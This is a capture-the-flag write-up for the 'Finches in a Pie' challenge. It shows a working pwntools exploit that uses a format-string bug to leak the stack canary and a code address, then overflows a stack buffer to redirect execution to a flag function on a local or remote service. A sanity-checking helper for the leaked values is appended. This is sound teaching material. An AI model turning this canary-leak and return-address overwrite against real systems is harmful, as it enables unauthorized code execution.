Finches in a Pie

Description

There’s a service at , exploit it to get the flag.

Files

fiap

flag.txt (you need this in the same directory as fiap for a local exploit; fiap reads the flag once you exploit it)

Enumeration

checksec

Running the code

Static Analysis

flag function

say_hi function

It takes two inputs from the user. The first input is printed back.

Since PIE is enabled, we need to leak the stack canary and a code address from the stack, so that we can overwrite the canary with its correct value (it changes on every run) and overwrite the return address with the address of the flag function.

Exploit

First we use the first BoF and the format string vulnerability to leak the address of say_hi+13 and the stack canary. Here we have to use "%#$p", where # is the position on the stack, instead of a long run of "%p" to dump the stack, because the stack slots we want to read would be overwritten by the "%p" string itself. Offset 3 holds the say_hi+13 address and offset 11 holds the canary value.

Then we need to figure out where the canary and the return address sit relative to the buffer during the second BoF. Once that is known, the payload is PADDING + canary + PADDING2 + return address (here we want to return to the flag function).

from pwn import *

isLocal = True

if isLocal:
    p = process("./fiap")
else:
    p = remote("95.216.233.106", 17954)

# Skip the ten banner lines the service prints before the first prompt.
for _ in range(10):
    p.recvline()

# First input: direct-parameter format specifiers leak stack slot 3
# (say_hi+13, a code address) and slot 11 (the stack canary).
p.sendline(b"%3$p %11$p ")
first_recv = p.recvline().split(b" ")

SAY_HI_13 = int(first_recv[2], 16)
CANARY = int(first_recv[3], 16)
# flag() is a fixed distance below say_hi+13, so the PIE base does not matter once leaked.
FLAG = SAY_HI_13 - 134

# Second input overflows the buffer; stack layout from the buffer upward:
# Padding
# Canary
# Padding 2
# FLAG (saved return address)
PADDING = b'A' * 25
PADDING2 = b'B' * 12

buf = b''
buf += PADDING
buf += p32(CANARY)
buf += PADDING2
buf += p32(FLAG)

p.sendline(buf)
p.recvline()
print(p.recvline())
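As an added example (not the writeup's own script), here is a small helper that parses the echoed leak line and sanity-checks the values before they are used: the canary's low byte must be 0x00 on glibc, and the code pointer must fit in 32 bits. The echoed line and its hex values are constructed for this example; the 134-byte distance between say_hi+13 and flag comes from the writeup.

```python
import re

# Distance between the leaked say_hi+13 address and flag(), as stated in the writeup.
FLAG_DELTA = 134

# Constructed sample of the line the service echoes back after "%3$p %11$p "
# (hypothetical values, not a real leak).
SAMPLE_LINE = b"Hello there 0x565561ad 0x8b4e2a00 \n"

HEX = re.compile(rb"0x[0-9a-fA-F]+")


def parse_leak(line: bytes):
    """Extract (code_ptr, canary) from the echoed line.

    Scanning for hex tokens instead of fixed split() indices keeps the
    parser working if the banner text around the values changes.
    """
    vals = [int(tok, 16) for tok in HEX.findall(line)]
    if len(vals) != 2:
        raise ValueError(f"expected 2 leaked values, got {len(vals)}: {line!r}")
    return vals[0], vals[1]


def canary_is_plausible(canary: int) -> bool:
    # glibc on Linux always clears the least-significant byte of the canary,
    # so a leak whose low byte is not 0x00 means the wrong stack slot was read.
    return 0 < canary < 2**32 and (canary & 0xFF) == 0


def flag_address(code_ptr: int) -> int:
    # With PIE the absolute addresses change per run, but the distance between
    # say_hi+13 and flag() inside the binary does not.
    return code_ptr - FLAG_DELTA


def check_leak(line: bytes) -> dict:
    code_ptr, canary = parse_leak(line)
    if not canary_is_plausible(canary):
        raise ValueError(f"canary {canary:#010x} does not end in 0x00; wrong offset?")
    if code_ptr >= 2**32:
        raise ValueError("code pointer wider than 32 bits; is this the 32-bit binary?")
    return {"say_hi_13": code_ptr, "canary": canary, "flag": flag_address(code_ptr)}


if __name__ == "__main__":
    print({k: hex(v) for k, v in check_leak(SAMPLE_LINE).items()})
```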
